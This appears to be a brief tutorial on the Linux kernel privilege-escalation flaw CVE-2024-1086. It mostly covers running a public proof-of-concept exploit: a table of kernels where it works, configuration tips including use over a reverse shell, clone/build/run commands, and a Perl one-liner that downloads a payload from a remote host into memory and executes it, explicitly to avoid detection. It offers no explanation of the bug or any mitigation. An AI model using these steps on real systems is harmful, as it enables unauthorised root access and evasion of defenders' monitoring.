Linux Local Privilage Escalation Vuln. Explained
How the CVE-2024-1086 vulnerability works.
The CVE-2024-1086 is a universal local privilege escalation exploit, working on most Linux kernels between the versions of 5.14 and 6.6, including KernelCTF, Debian and Ubuntu. The success rate is 99.4% in KernelCTF images according to Notselwyn.
Kernel Versions Tested
Kernel Version | Distro | Distro Version | Status |
---|---|---|---|
v5.14.21 | n/a | n/a | working |
v5.15.148 | n/a | n/a | working |
v5.16.20 | n/a | n/a | working |
v5.17.15 | n/a | n/a | working |
v5.18.19 | n/a | n/a | working |
v5.19.17 | n/a | n/a | working |
v6.0.19 | n/a | n/a | working |
v6.1.55 | KernelCTF | Mitigation v3 | working |
v6.1.69 | Debian | Bookworm 6.1.0-17 | working |
v6.1.69 | Debian | Bookworm 6.1.0-17 | working |
v6.1.72 | KernelCTF | LTS | working |
v6.2.? | Ubuntu | Jammy v6.2.0-37 | working |
v6.2.16 | n/a | n/a | working |
v6.3.13 | n/a | n/a | working |
Usage
Configuration
The default values should work on Debian, Ubuntu, and KernelCTF with a local shell. On the distros that haven't been tested, please make sure the kconfig values that can be specified in src/config.h
match with the target kernel. If you are running the POC on a computer with more than 32GiB of RAM, make sure to increase CONFIG_PHYS_MEM
.
If you are running the exploit over SSH (into the test machine) or a reverse shell, you may want to toggle CONFIG_REDIRECT_LOG
to 1
to avoid unnecessary network activity.
Building
If the build process is impractical for you, Notselwyn made a compiled x64 binary with the default config.
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
Running
Running the exploit is as easy as running:
./exploit
Fileless execution is also supported, in case of situations where detections need to be avoided. However, Perl needs to be installed on the target:
perl -e '
require qw/syscall.ph/;
my $fd = syscall(SYS_memfd_create(), $fn, 0);
system "curl https://example.com/exploit -s >&$fd";
exec {"/proc/$$/fd/$fd"} "memfd";
'
Special Thanks
This tutorial was mostly written with the help of the exploit's POC creator, Notselwyn, his POC can be found here. Thank you!